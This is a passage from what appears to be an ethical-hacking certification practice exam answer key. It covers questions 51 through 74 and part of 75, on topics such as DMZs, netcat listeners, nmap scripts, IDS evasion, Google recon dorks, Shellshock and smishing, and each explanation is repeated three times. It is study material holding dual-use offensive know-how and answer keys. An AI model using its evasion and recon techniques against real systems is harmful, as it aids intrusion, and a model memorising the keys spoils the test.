CSRF is correct. OWASP defines CSRF (cross-site request forgery) as a type of attack that occurs when a malicious website, e-mail, blog, instant message, or program causes a user’s web browser to perform an unwanted action on a trusted site for which the user is currently authenticated. The idea is simple, and the results are extraordinarily evil: take over an already-authenticated web session and have the victim’s browser send messages for you.
Incorrect answers:
All other answers are incorrect. These attacks do not match the scenario given.
Question 51 of 100
51. Question
Which of the following is a controlled buffer network between the organization’s internal network and the Internet?
Correct
Correct answer:
DMZ is correct. DMZ (for demilitarized zone) comes from the military and refers to a section of land between two adversarial parties where there are no weapons and fighting. The idea is you can see an adversary coming across the DMZ and have time to work up a defense. In networking, the idea is the same: it’s a controlled, buffer network between you and the uncontrolled chaos of the Internet.
Incorrect answers:
The production zone is a very restricted zone that strictly controls direct access from uncontrolled zones and does not hold users.
The intranet is your internal network—a controlled zone that has little-to-no heavy restrictions, since everything is internal.
The management network zone is usually an area you’d find rife with VLANs and maybe controlled via IPSec and such. This is a highly secured zone with very strict policies.
Incorrect
Correct answer:
DMZ is correct. DMZ (for demilitarized zone) comes from the military and refers to a section of land between two adversarial parties where there are no weapons and fighting. The idea is you can see an adversary coming across the DMZ and have time to work up a defense. In networking, the idea is the same: it’s a controlled, buffer network between you and the uncontrolled chaos of the Internet.
Incorrect answers:
The production zone is a very restricted zone that strictly controls direct access from uncontrolled zones and does not hold users.
The intranet is your internal network—a controlled zone that has little-to-no heavy restrictions, since everything is internal.
The management network zone is usually an area you’d find rife with VLANs and maybe controlled via IPSec and such. This is a highly secured zone with very strict policies.
Unattempted
Correct answer:
DMZ is correct. DMZ (for demilitarized zone) comes from the military and refers to a section of land between two adversarial parties where there are no weapons and fighting. The idea is you can see an adversary coming across the DMZ and have time to work up a defense. In networking, the idea is the same: it’s a controlled, buffer network between you and the uncontrolled chaos of the Internet.
Incorrect answers:
The production zone is a very restricted zone that strictly controls direct access from uncontrolled zones and does not hold users.
The intranet is your internal network—a controlled zone that has little-to-no heavy restrictions, since everything is internal.
The management network zone is usually an area you’d find rife with VLANs and maybe controlled via IPSec and such. This is a highly secured zone with very strict policies.
Question 52 of 100
52. Question
An attacker is setting up a netcat listener on a Windows system and wants it to stay in persistent mode. Which of the following commands does this?
Correct
Correct answer:
-L is correct. The uppercase L not only puts the port into listening mode but tells it to stay persistent (if the client kills the connection for any reason, it will remain in a listening state).
Incorrect answers:
-l, -e, and -n are incorrect. The -l option opens the port as a listening port but does not keep it persistent. The -e and -n options (-e defines a program to execute, and -n prohibits DNS lookups) don’t apply.
Incorrect
Correct answer:
-L is correct. The uppercase L not only puts the port into listening mode but tells it to stay persistent (if the client kills the connection for any reason, it will remain in a listening state).
Incorrect answers:
-l, -e, and -n are incorrect. The -l option opens the port as a listening port but does not keep it persistent. The -e and -n options (-e defines a program to execute, and -n prohibits DNS lookups) don’t apply.
Unattempted
Correct answer:
-L is correct. The uppercase L not only puts the port into listening mode but tells it to stay persistent (if the client kills the connection for any reason, it will remain in a listening state).
Incorrect answers:
-l, -e, and -n are incorrect. The -l option opens the port as a listening port but does not keep it persistent. The -e and -n options (-e defines a program to execute, and -n prohibits DNS lookups) don’t apply.
Question 53 of 100
53. Question
Which nmap script helps with detection of HTTP GET, POST, HEAD, PUT, DELETE, and TRACE methods?
Correct
Correct answer:
http-methods is correct. The following is from nmap.org regarding the script: “Finds out what options are supported by an HTTP server by sending an OPTIONS request. Lists potentially risky methods. It tests those methods not mentioned in the OPTIONS headers individually and sees if they are implemented. Any output other than 501/405 suggests that the method is not in the range 400 to 600…. In this script, ‘potentially risky’ methods are anything except GET, HEAD, POST, and OPTIONS. If the script reports potentially risky methods, they may not all be security risks, but you should check to make sure.”
Incorrect answers:
All other answers are incorrect. These are not scripts in nmap to show HTTP methods.
Incorrect
Correct answer:
http-methods is correct. The following is from nmap.org regarding the script: “Finds out what options are supported by an HTTP server by sending an OPTIONS request. Lists potentially risky methods. It tests those methods not mentioned in the OPTIONS headers individually and sees if they are implemented. Any output other than 501/405 suggests that the method is not in the range 400 to 600…. In this script, ‘potentially risky’ methods are anything except GET, HEAD, POST, and OPTIONS. If the script reports potentially risky methods, they may not all be security risks, but you should check to make sure.”
Incorrect answers:
All other answers are incorrect. These are not scripts in nmap to show HTTP methods.
Unattempted
Correct answer:
http-methods is correct. The following is from nmap.org regarding the script: “Finds out what options are supported by an HTTP server by sending an OPTIONS request. Lists potentially risky methods. It tests those methods not mentioned in the OPTIONS headers individually and sees if they are implemented. Any output other than 501/405 suggests that the method is not in the range 400 to 600…. In this script, ‘potentially risky’ methods are anything except GET, HEAD, POST, and OPTIONS. If the script reports potentially risky methods, they may not all be security risks, but you should check to make sure.”
Incorrect answers:
All other answers are incorrect. These are not scripts in nmap to show HTTP methods.
Question 54 of 100
54. Question
Traceroute works by stopping at each hop on the way to the destination and providing information to the sender about that hop. How does traceroute manipulate the TTL of the packet to accomplish this?
Correct
Correct answer:
The TTL is incremented by 1 for each hop discovered is correct. Traceroute starts by setting the TTL to 1. At the first hop, the return packet provides information about that stop along the way. Traceroute then sends the next packet with TTL set to 2, ensuring it will receive information about the hop just after the one it has already discovered. This is repeated until the destination is reached.
Incorrect answers:
All other answers are incorrect. These are not accurate statements regarding traceroute.
Incorrect
Correct answer:
The TTL is incremented by 1 for each hop discovered is correct. Traceroute starts by setting the TTL to 1. At the first hop, the return packet provides information about that stop along the way. Traceroute then sends the next packet with TTL set to 2, ensuring it will receive information about the hop just after the one it has already discovered. This is repeated until the destination is reached.
Incorrect answers:
All other answers are incorrect. These are not accurate statements regarding traceroute.
Unattempted
Correct answer:
The TTL is incremented by 1 for each hop discovered is correct. Traceroute starts by setting the TTL to 1. At the first hop, the return packet provides information about that stop along the way. Traceroute then sends the next packet with TTL set to 2, ensuring it will receive information about the hop just after the one it has already discovered. This is repeated until the destination is reached.
Incorrect answers:
All other answers are incorrect. These are not accurate statements regarding traceroute.
Question 55 of 100
55. Question
Which of the following is the best choice for protection against privilege escalation vulnerabilities?
Correct
Correct answer:
Ensuring services run with least privilege is correct. Ensuring your services run with least privilege (instead of having all services run at admin level) can help in slowing down privilege escalation.
Incorrect answers:
Ensuring drivers are in good shape is good practice but doesn’t have a lot to do with privilege escalation prevention.
Admin accounts don’t run with least privilege; they’re admin accounts for a reason.
Automating services may save time but doesn’t slow down hacking efforts.
Incorrect
Correct answer:
Ensuring services run with least privilege is correct. Ensuring your services run with least privilege (instead of having all services run at admin level) can help in slowing down privilege escalation.
Incorrect answers:
Ensuring drivers are in good shape is good practice but doesn’t have a lot to do with privilege escalation prevention.
Admin accounts don’t run with least privilege; they’re admin accounts for a reason.
Automating services may save time but doesn’t slow down hacking efforts.
Unattempted
Correct answer:
Ensuring services run with least privilege is correct. Ensuring your services run with least privilege (instead of having all services run at admin level) can help in slowing down privilege escalation.
Incorrect answers:
Ensuring drivers are in good shape is good practice but doesn’t have a lot to do with privilege escalation prevention.
Admin accounts don’t run with least privilege; they’re admin accounts for a reason.
Automating services may save time but doesn’t slow down hacking efforts.
Question 56 of 100
56. Question
You are discussing methods to evade IDS detection with your team. One team member suggests sending large amounts of traffic to the IDS in an effort to hide the true attack traffic. Which of the following best describes this effort?
Correct
Correct answer:
False-positive generation is correct. Lots of traffic can oftentimes provide “cover fire” for your attack. The very presence of so many false positives and so much traffic on its own indicates _something_ is going on, but the idea is valid.
Incorrect answers:
All other answers are incorrect. Session splicing, source routing, and address spoofing have nothing to do with generating large amounts of traffic.
Incorrect
Correct answer:
False-positive generation is correct. Lots of traffic can oftentimes provide “cover fire” for your attack. The very presence of so many false positives and so much traffic on its own indicates _something_ is going on, but the idea is valid.
Incorrect answers:
All other answers are incorrect. Session splicing, source routing, and address spoofing have nothing to do with generating large amounts of traffic.
Unattempted
Correct answer:
False-positive generation is correct. Lots of traffic can oftentimes provide “cover fire” for your attack. The very presence of so many false positives and so much traffic on its own indicates _something_ is going on, but the idea is valid.
Incorrect answers:
All other answers are incorrect. Session splicing, source routing, and address spoofing have nothing to do with generating large amounts of traffic.
Question 57 of 100
57. Question
Which of the following jailbreaking techniques will leave the phone in a jailbroken state even after a reboot?
Correct
Correct answer:
Untethered is correct. If untethered jailbreaking has been performed, the device is in a jailbroken state forever, with or without connection to another device.
Incorrect answers:
With tethered jailbreaking, a reboot removes all jailbreaking patches, and the phone may get stuck in a perpetual loop on startup, requiring a system connection (USB) to repair.
With semi-tethered jailbreaking, a reboot no longer retains the patched kernel; however, the software has already been added to the device. Therefore, if admin privileges are required, the installed jailbreaking tool can be used.
Rooted is a distractor.
Incorrect
Correct answer:
Untethered is correct. If untethered jailbreaking has been performed, the device is in a jailbroken state forever, with or without connection to another device.
Incorrect answers:
With tethered jailbreaking, a reboot removes all jailbreaking patches, and the phone may get stuck in a perpetual loop on startup, requiring a system connection (USB) to repair.
With semi-tethered jailbreaking, a reboot no longer retains the patched kernel; however, the software has already been added to the device. Therefore, if admin privileges are required, the installed jailbreaking tool can be used.
Rooted is a distractor.
Unattempted
Correct answer:
Untethered is correct. If untethered jailbreaking has been performed, the device is in a jailbroken state forever, with or without connection to another device.
Incorrect answers:
With tethered jailbreaking, a reboot removes all jailbreaking patches, and the phone may get stuck in a perpetual loop on startup, requiring a system connection (USB) to repair.
With semi-tethered jailbreaking, a reboot no longer retains the patched kernel; however, the software has already been added to the device. Therefore, if admin privileges are required, the installed jailbreaking tool can be used.
Rooted is a distractor.
Question 58 of 100
58. Question
Which of the following is a software application used to asymmetrically encrypt and digitally sign e-mail?
Correct
Correct answer:
PGP is correct. Pretty Good Privacy is used for signing, compression, and encrypting and decrypting e-mails, files, directories, and even whole disk partitions, mainly in an effort to increase the security of e-mail communications.
incorrect answers:
All other answers are incorrect. The remaining answers do not necessarily have a thing to do with e-mail encryption.
Incorrect
Correct answer:
PGP is correct. Pretty Good Privacy is used for signing, compression, and encrypting and decrypting e-mails, files, directories, and even whole disk partitions, mainly in an effort to increase the security of e-mail communications.
incorrect answers:
All other answers are incorrect. The remaining answers do not necessarily have a thing to do with e-mail encryption.
Unattempted
Correct answer:
PGP is correct. Pretty Good Privacy is used for signing, compression, and encrypting and decrypting e-mails, files, directories, and even whole disk partitions, mainly in an effort to increase the security of e-mail communications.
incorrect answers:
All other answers are incorrect. The remaining answers do not necessarily have a thing to do with e-mail encryption.
Question 59 of 100
59. Question
Which of the following tools provides instant visibility and continuous protection for servers in any combination of data centers, private clouds, and public clouds?
Correct
Correct answer:
CloudPassage Halo is correct. CloudPassage Halo “provides instant visibility and continuous protection for servers in any combination of data centers, private clouds, and public clouds.”
Incorrect answers:
Metasploit is a framework for delivering exploits.
AWSExploit is not a legitimate tool.
CloudInspect was designed for AWS cloud subscribers and runs as an automated, all-in-one testing suite specifically for your cloud subscription.
Incorrect
Correct answer:
CloudPassage Halo is correct. CloudPassage Halo “provides instant visibility and continuous protection for servers in any combination of data centers, private clouds, and public clouds.”
Incorrect answers:
Metasploit is a framework for delivering exploits.
AWSExploit is not a legitimate tool.
CloudInspect was designed for AWS cloud subscribers and runs as an automated, all-in-one testing suite specifically for your cloud subscription.
Unattempted
Correct answer:
CloudPassage Halo is correct. CloudPassage Halo “provides instant visibility and continuous protection for servers in any combination of data centers, private clouds, and public clouds.”
Incorrect answers:
Metasploit is a framework for delivering exploits.
AWSExploit is not a legitimate tool.
CloudInspect was designed for AWS cloud subscribers and runs as an automated, all-in-one testing suite specifically for your cloud subscription.
Question 60 of 100
60. Question
You are performing recon on a target and want to see if they keep their employee listing available on their website. Which of the following would search for a page called “employees” on the target.com site?
Correct
Correct answer:
intitle:“employees” site:target.com is correct. This syntax tells Google to display URLs from pages that have employees in their title. The addition of the “site:” argument restricts the results to only pages in target.com.
Incorrect answers:
All other answers are incorrect. These are all incorrect syntax.
Incorrect
Correct answer:
intitle:“employees” site:target.com is correct. This syntax tells Google to display URLs from pages that have employees in their title. The addition of the “site:” argument restricts the results to only pages in target.com.
Incorrect answers:
All other answers are incorrect. These are all incorrect syntax.
Unattempted
Correct answer:
intitle:“employees” site:target.com is correct. This syntax tells Google to display URLs from pages that have employees in their title. The addition of the “site:” argument restricts the results to only pages in target.com.
Incorrect answers:
All other answers are incorrect. These are all incorrect syntax.
Question 61 of 100
61. Question
Your team is testing a server that serves PHP pages for the Shellshock vulnerability. Which of the following actions should you take?
Correct
Correct answer:
Send specially created environment variables and trailing commands. is correct. Shellshock allows an attacker to add trailing information in environment variables.
Incorrect answers:
All other answers are incorrect. These answers do not match the Shellshock vulnerability.
Incorrect
Correct answer:
Send specially created environment variables and trailing commands. is correct. Shellshock allows an attacker to add trailing information in environment variables.
Incorrect answers:
All other answers are incorrect. These answers do not match the Shellshock vulnerability.
Unattempted
Correct answer:
Send specially created environment variables and trailing commands. is correct. Shellshock allows an attacker to add trailing information in environment variables.
Incorrect answers:
All other answers are incorrect. These answers do not match the Shellshock vulnerability.
Question 62 of 100
62. Question
A pen test specialist is running netcat to transfer a file between two hosts and becomes concerned the traffic is being sniffed. Which of the following methods is the best way to ensure the transfer is protected from sniffing?
Correct
Correct answer:
Use CryptCat instead. is correct. CryptCat is the encrypted version of netcat.
Incorrect answers:
Traffic on a switched network can still be sniffed.
Promiscuous mode on the NIC has nothing to do with encryption.
The -e option in netcat does nothing for encryption.
Incorrect
Correct answer:
Use CryptCat instead. is correct. CryptCat is the encrypted version of netcat.
Incorrect answers:
Traffic on a switched network can still be sniffed.
Promiscuous mode on the NIC has nothing to do with encryption.
The -e option in netcat does nothing for encryption.
Unattempted
Correct answer:
Use CryptCat instead. is correct. CryptCat is the encrypted version of netcat.
Incorrect answers:
Traffic on a switched network can still be sniffed.
Promiscuous mode on the NIC has nothing to do with encryption.
The -e option in netcat does nothing for encryption.
Question 63 of 100
63. Question
Which of the following statements is true?
Correct
Correct Answer:
Both Sniffers operate at Layer 2 of the OSI model and sniffers operate at Layer 3 of the OSI model are correct. Sniffers operate at Layers 2 and 3 of the OSI model. Layer 2 provides for physical addressing and framing (MAC addresses, Ethernet frames, and so on) and Layer 3 handles the packets and payloads (IP addressing and such).
Incorrect Answers:
Sniffers operate at Layer 1 of the OSI model, Sniffers operate at Layer 2 of the OSI model, and Sniffers operate at Layer 3 of the OSI model are incorrect.
I get it—technically nothing works without Layer 1, but we all know that’s not what’s being asked here. Answers B and C are both correct but neither is the best answer.
Incorrect
Correct Answer:
Both Sniffers operate at Layer 2 of the OSI model and sniffers operate at Layer 3 of the OSI model are correct. Sniffers operate at Layers 2 and 3 of the OSI model. Layer 2 provides for physical addressing and framing (MAC addresses, Ethernet frames, and so on) and Layer 3 handles the packets and payloads (IP addressing and such).
Incorrect Answers:
Sniffers operate at Layer 1 of the OSI model, Sniffers operate at Layer 2 of the OSI model, and Sniffers operate at Layer 3 of the OSI model are incorrect.
I get it—technically nothing works without Layer 1, but we all know that’s not what’s being asked here. Answers B and C are both correct but neither is the best answer.
Unattempted
Correct Answer:
Both Sniffers operate at Layer 2 of the OSI model and sniffers operate at Layer 3 of the OSI model are correct. Sniffers operate at Layers 2 and 3 of the OSI model. Layer 2 provides for physical addressing and framing (MAC addresses, Ethernet frames, and so on) and Layer 3 handles the packets and payloads (IP addressing and such).
Incorrect Answers:
Sniffers operate at Layer 1 of the OSI model, Sniffers operate at Layer 2 of the OSI model, and Sniffers operate at Layer 3 of the OSI model are incorrect.
I get it—technically nothing works without Layer 1, but we all know that’s not what’s being asked here. Answers B and C are both correct but neither is the best answer.
Question 64 of 100
64. Question
Your client has encrypted communications between two segments using SSL. They are concerned about possible intrusion attempts and install an IDS between the two to monitor the traffic. You advise against this for what reason?
Correct
Correct answer:
The IDS is blind to SSL traffic. is correct. Encryption is the nemesis of an IDS because it cannot see the traffic.
Incorrect answers:
All other answers are incorrect. SSL does not affect false positives or negatives and certainly does not fail because of passive sniffing.
Incorrect
Correct answer:
The IDS is blind to SSL traffic. is correct. Encryption is the nemesis of an IDS because it cannot see the traffic.
Incorrect answers:
All other answers are incorrect. SSL does not affect false positives or negatives and certainly does not fail because of passive sniffing.
Unattempted
Correct answer:
The IDS is blind to SSL traffic. is correct. Encryption is the nemesis of an IDS because it cannot see the traffic.
Incorrect answers:
All other answers are incorrect. SSL does not affect false positives or negatives and certainly does not fail because of passive sniffing.
Question 65 of 100
65. Question
You are concerned a machine (192.168.15.12) on the network does not seem to be sending logs to a system running syslog (192.168.15.90). Which of the following filters is the best choice to see if the system is sending messages to the syslog server?
Correct
Correct answer:
tcp.dstport==514 && ip.dst==192.168.15.90 is correct. The port number for syslog (514) traffic is intended to be called out in tcp.dstport (the destination port), and the destination IP (192.168.15.90) is called out by ip.dst (IP destination).
Incorrect answers
All other answers are incorrect. These answers do not match the correct syntax.
Incorrect
Correct answer:
tcp.dstport==514 && ip.dst==192.168.15.90 is correct. The port number for syslog (514) traffic is intended to be called out in tcp.dstport (the destination port), and the destination IP (192.168.15.90) is called out by ip.dst (IP destination).
Incorrect answers
All other answers are incorrect. These answers do not match the correct syntax.
Unattempted
Correct answer:
tcp.dstport==514 && ip.dst==192.168.15.90 is correct. The port number for syslog (514) traffic is intended to be called out in tcp.dstport (the destination port), and the destination IP (192.168.15.90) is called out by ip.dst (IP destination).
Incorrect answers
All other answers are incorrect. These answers do not match the correct syntax.
Question 66 of 100
66. Question
You have an FTP service and an HTTP site on a single server. Which DNS record allows you to alias both services to the same record (IP address)?
Correct
Correct answer:
CNAME is correct. CNAME records provide for aliases within the zone.
Incorrect answers:
All other answers are incorrect. Name Server, Start of Authority, and Pointer records do not alias anything.
Incorrect
Correct answer:
CNAME is correct. CNAME records provide for aliases within the zone.
Incorrect answers:
All other answers are incorrect. Name Server, Start of Authority, and Pointer records do not alias anything.
Unattempted
Correct answer:
CNAME is correct. CNAME records provide for aliases within the zone.
Incorrect answers:
All other answers are incorrect. Name Server, Start of Authority, and Pointer records do not alias anything.
Question 67 of 100
67. Question
Which of the following represents the highest risk to an organization?
Correct
Correct answer:
Disgruntled employee is correct. It’s bad enough we have to worry about the external hackers trying to break their way into a network, but what about all the folks we already let onto it? Disgruntled employees are a serious threat because they already have connectivity and, depending on their job, a lot of access to otherwise protected areas.
Incorrect answers:
A black hat is an external, malicious attacker.
A white hat is an ethical hacker.
A gray hat doesn’t work under an agreement but might not be malicious in his efforts.
Incorrect
Correct answer:
Disgruntled employee is correct. It’s bad enough we have to worry about the external hackers trying to break their way into a network, but what about all the folks we already let onto it? Disgruntled employees are a serious threat because they already have connectivity and, depending on their job, a lot of access to otherwise protected areas.
Incorrect answers:
A black hat is an external, malicious attacker.
A white hat is an ethical hacker.
A gray hat doesn’t work under an agreement but might not be malicious in his efforts.
Unattempted
Correct answer:
Disgruntled employee is correct. It’s bad enough we have to worry about the external hackers trying to break their way into a network, but what about all the folks we already let onto it? Disgruntled employees are a serious threat because they already have connectivity and, depending on their job, a lot of access to otherwise protected areas.
Incorrect answers:
A black hat is an external, malicious attacker.
A white hat is an ethical hacker.
A gray hat doesn’t work under an agreement but might not be malicious in his efforts.
Question 68 of 100
68. Question
Your organization’s leadership wants security to monitor all traffic coming into and out of the network for malicious intent. Which of the following should you implement?
Correct
Correct Answer:
Network-based IDS is correct.
An intrusion detection system is what’s being called for here, and an NIDS (network IDS) will watch all network traffic. The network tap location is very important in setting up an NIDS—if not tapped at a location (or in locations) where all network traffic flows through, the tool won’t see everything.
Incorrect Answers:
Host-based IDS, Firewall, and Proxy are incorrect.
Answer Host-based IDS gets the IDS part right but misses out with “host” (which only monitors a single system, not an entire subnet).
Firewalls aren’t used for this purpose—they’re designed to block and allow specific traffic.
A proxy is used either to hide behind when you’re on the outside trying to get in, as an anonymizer-type front from internal to external, or as a repository for information internal machines can hit instead of going outside the subnet.
Incorrect
Correct Answer:
Network-based IDS is correct.
An intrusion detection system is what’s being called for here, and an NIDS (network IDS) will watch all network traffic. The network tap location is very important in setting up an NIDS—if not tapped at a location (or in locations) where all network traffic flows through, the tool won’t see everything.
Incorrect Answers:
Host-based IDS, Firewall, and Proxy are incorrect.
Answer Host-based IDS gets the IDS part right but misses out with “host” (which only monitors a single system, not an entire subnet).
Firewalls aren’t used for this purpose—they’re designed to block and allow specific traffic.
A proxy is used either to hide behind when you’re on the outside trying to get in, as an anonymizer-type front from internal to external, or as a repository for information internal machines can hit instead of going outside the subnet.
Unattempted
Correct Answer:
Network-based IDS is correct.
An intrusion detection system is what’s being called for here, and an NIDS (network IDS) will watch all network traffic. The network tap location is very important in setting up an NIDS—if not tapped at a location (or in locations) where all network traffic flows through, the tool won’t see everything.
Incorrect Answers:
Host-based IDS, Firewall, and Proxy are incorrect.
Answer Host-based IDS gets the IDS part right but misses out with “host” (which only monitors a single system, not an entire subnet).
Firewalls aren’t used for this purpose—they’re designed to block and allow specific traffic.
A proxy is used either to hide behind when you’re on the outside trying to get in, as an anonymizer-type front from internal to external, or as a repository for information internal machines can hit instead of going outside the subnet.
Question 69 of 100
69. Question
A client wants the best platform for software development. Which cloud service type best meets his needs?
Correct
Correct Answer:
PaaS is correct.
Platform as a Service (PaaS) is geared toward software development because it provides a development platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software. Hardware and software are hosted by the provider on its own infrastructure so customers do not have to install or build homegrown hardware and software for development work. PaaS doesn’t usually replace an organization’s actual infrastructure; instead, it just offers key services the organization may not have onsite.
Incorrect Answers:
IaaS, SaaS, and Hypervisor are incorrect.
Infrastructure as a Service (IaaS) basically provides virtualized computing resources over the Internet. Software as a Service (SaaS) is simply a software distribution model—the provider offers on-demand applications to subscribers over the Internet. Hypervisor is a term associated with the provision of virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM).
Incorrect
Correct Answer:
PaaS is correct.
Platform as a Service (PaaS) is geared toward software development because it provides a development platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software. Hardware and software are hosted by the provider on its own infrastructure so customers do not have to install or build homegrown hardware and software for development work. PaaS doesn’t usually replace an organization’s actual infrastructure; instead, it just offers key services the organization may not have onsite.
Incorrect Answers:
IaaS, SaaS, and Hypervisor are incorrect.
Infrastructure as a Service (IaaS) basically provides virtualized computing resources over the Internet. Software as a Service (SaaS) is simply a software distribution model—the provider offers on-demand applications to subscribers over the Internet. Hypervisor is a term associated with the provision of virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM).
Unattempted
Correct Answer:
PaaS is correct.
Platform as a Service (PaaS) is geared toward software development because it provides a development platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software. Hardware and software are hosted by the provider on its own infrastructure so customers do not have to install or build homegrown hardware and software for development work. PaaS doesn’t usually replace an organization’s actual infrastructure; instead, it just offers key services the organization may not have onsite.
Incorrect Answers:
IaaS, SaaS, and Hypervisor are incorrect.
Infrastructure as a Service (IaaS) basically provides virtualized computing resources over the Internet. Software as a Service (SaaS) is simply a software distribution model—the provider offers on-demand applications to subscribers over the Internet. Hypervisor is a term associated with the provision of virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM).
Question 70 of 100
70. Question
Which of the following describes a transmission channel that is being used in a manner in which it was not intended?
Correct
Correct answer:
Covert channel is correct. A covert channel is a transmission method used in a way for which it was not intended—generally for the purposes of hiding data transmissions and/or violating security policy.
Incorrect answers:
An overt channel is one that’s used as designed and within policy.
A wrapper refers to the application used to hide a Trojan by binding it to a legitimate file.
Hidden channel is included as a distractor.
Incorrect
Correct answer:
Covert channel is correct. A covert channel is a transmission method used in a way for which it was not intended—generally for the purposes of hiding data transmissions and/or violating security policy.
Incorrect answers:
An overt channel is one that’s used as designed and within policy.
A wrapper refers to the application used to hide a Trojan by binding it to a legitimate file.
Hidden channel is included as a distractor.
Unattempted
Correct answer:
Covert channel is correct. A covert channel is a transmission method used in a way for which it was not intended—generally for the purposes of hiding data transmissions and/or violating security policy.
Incorrect answers:
An overt channel is one that’s used as designed and within policy.
A wrapper refers to the application used to hide a Trojan by binding it to a legitimate file.
Hidden channel is included as a distractor.
Question 71 of 100
71. Question
Which of the following best represents SOA?
Correct
Correct Answer:
An API that allows different components to communicate is correct.
Service-Oriented Architecture (SOA) is all about software components delivering information to one another on a network, and this is the best available answer. SOA is a part of an architectural strategy in computer software design where components of applications provide services to other components via a communications protocol. SOA principles are independent of vendor, product, or technology.
Incorrect Answers:
A file server, An application containing both the user interface and the code allowing access to the data, and A single database accessed by multiple sources are incorrect.
These do not describe SOA.
Incorrect
Correct Answer:
An API that allows different components to communicate is correct.
Service-Oriented Architecture (SOA) is all about software components delivering information to one another on a network, and this is the best available answer. SOA is a part of an architectural strategy in computer software design where components of applications provide services to other components via a communications protocol. SOA principles are independent of vendor, product, or technology.
Incorrect Answers:
A file server, An application containing both the user interface and the code allowing access to the data, and A single database accessed by multiple sources are incorrect.
These do not describe SOA.
Unattempted
Correct Answer:
An API that allows different components to communicate is correct.
Service-Oriented Architecture (SOA) is all about software components delivering information to one another on a network, and this is the best available answer. SOA is a part of an architectural strategy in computer software design where components of applications provide services to other components via a communications protocol. SOA principles are independent of vendor, product, or technology.
Incorrect Answers:
A file server, An application containing both the user interface and the code allowing access to the data, and A single database accessed by multiple sources are incorrect.
These do not describe SOA.
Question 72 of 100
72. Question
Which of the following can be compared to a CSRF attack?
Correct
Correct answer:
Session riding is correct. Session riding is, in effect, simply CSRF under a different name and deals with cloud services instead of traditional data centers.
Incorrect answers:
Side-channel attacks, also known as cross-guest VM breach, deal with attackers gaining control of the existing virtualization itself.
Side session and VM straddling are not legitimate terms.
Incorrect
Correct answer:
Session riding is correct. Session riding is, in effect, simply CSRF under a different name and deals with cloud services instead of traditional data centers.
Incorrect answers:
Side-channel attacks, also known as cross-guest VM breach, deal with attackers gaining control of the existing virtualization itself.
Side session and VM straddling are not legitimate terms.
Unattempted
Correct answer:
Session riding is correct. Session riding is, in effect, simply CSRF under a different name and deals with cloud services instead of traditional data centers.
Incorrect answers:
Side-channel attacks, also known as cross-guest VM breach, deal with attackers gaining control of the existing virtualization itself.
Side session and VM straddling are not legitimate terms.
Question 73 of 100
73. Question
A user with appropriate credentials enters the following command: “` net use F: \\ECCCOMPUTER\BankFiles /persistent:yes “` Which of the following statements are true regarding this command? (Choose all that apply.)
Correct
Correct answers:
In Windows Explorer, a drive will appear denoted as BankFiles (\\ECCCOMPUTER) (F:) and the mapped drive will remain mapped after a reboot are correct. Net use commands were the rage back in the day. This command connects to a shared folder on ECCCOMPUTER. The shared folder is named BankFiles, and the mapping will display as a drive (F:) on the local machine. The “persistent:yes” portion means it will remain mapped forever, until you turn it off.
Incorrect answers:
All other answers are incorrect. These do not reflect the outcome of the command.
Incorrect
Correct answers:
In Windows Explorer, a drive will appear denoted as BankFiles (\\ECCCOMPUTER) (F:) and the mapped drive will remain mapped after a reboot are correct. Net use commands were the rage back in the day. This command connects to a shared folder on ECCCOMPUTER. The shared folder is named BankFiles, and the mapping will display as a drive (F:) on the local machine. The “persistent:yes” portion means it will remain mapped forever, until you turn it off.
Incorrect answers:
All other answers are incorrect. These do not reflect the outcome of the command.
Unattempted
Correct answers:
In Windows Explorer, a drive will appear denoted as BankFiles (\\ECCCOMPUTER) (F:) and the mapped drive will remain mapped after a reboot are correct. Net use commands were the rage back in the day. This command connects to a shared folder on ECCCOMPUTER. The shared folder is named BankFiles, and the mapping will display as a drive (F:) on the local machine. The “persistent:yes” portion means it will remain mapped forever, until you turn it off.
Incorrect answers:
All other answers are incorrect. These do not reflect the outcome of the command.
Question 74 of 100
74. Question
Which of the following statements best defines smishing?
Correct
Correct answer:
It is sending SMS texts to a user in an effort to trick them into downloading malicious code is correct. Smishing comes from cramming SMS (texting) and phishing together. “Smishing,” get it? The idea is the same as with phishing, except you use text messaging to trick users into downloading stuff.
Incorrect answers:
All other answers are incorrect. These statements do not apply to smishing.
Incorrect
Correct answer:
It is sending SMS texts to a user in an effort to trick them into downloading malicious code is correct. Smishing comes from cramming SMS (texting) and phishing together. “Smishing,” get it? The idea is the same as with phishing, except you use text messaging to trick users into downloading stuff.
Incorrect answers:
All other answers are incorrect. These statements do not apply to smishing.
Unattempted
Correct answer:
It is sending SMS texts to a user in an effort to trick them into downloading malicious code is correct. Smishing comes from cramming SMS (texting) and phishing together. “Smishing,” get it? The idea is the same as with phishing, except you use text messaging to trick users into downloading stuff.
Incorrect answers:
All other answers are incorrect. These statements do not apply to smishing.
Question 75 of 100
75. Question
A senior leader asks the security team what measures can be taken to discover sniffers on the network. Which of the following statements is true regarding sniffers?
Correct
Correct Answer:
It is almost impossible to discover a sniffer on the network is correct.
While not impossible, sniffer discovery _is_ difficult. If the sniffer is implanted somewhere on the network using a device with an IP address, it may be possible to find it (the system it’s running on will have _some_ record of it somewhere). However, many network taps are passive and have no address at all. A NIC just pulling packets in won’t necessarily alert anything or provide any triggers for watchful eyes. However, active sniffing, where MAC flooding or ARP spoofing is being used, is another thing altogether.
Incorrect Answers:
Pinging all addresses and examining response latency will discover a sniffer, Sending ARP messages to all systems and watching for NOARP responses will discover a sniffer, and Configuring the IDS to watch for NICs in promiscuous mode will discover sniffers are incorrect.
Latency in a ping response has nothing to do with sniffing; NOARP is a Linux kernel module, and it’s impossible to see a NIC in promiscuous mode from a monitoring station (unless you’re on the system itself and looking at the NIC properties).
Incorrect
Correct Answer:
It is almost impossible to discover a sniffer on the network is correct.
While not impossible, sniffer discovery _is_ difficult. If the sniffer is implanted somewhere on the network using a device with an IP address, it may be possible to find it (the system it’s running on will have _some_ record of it somewhere). However, many network taps are passive and have no address at all. A NIC just pulling packets in won’t necessarily alert anything or provide any triggers for watchful eyes. However, active sniffing, where MAC flooding or ARP spoofing is being used, is another thing altogether.
Incorrect Answers:
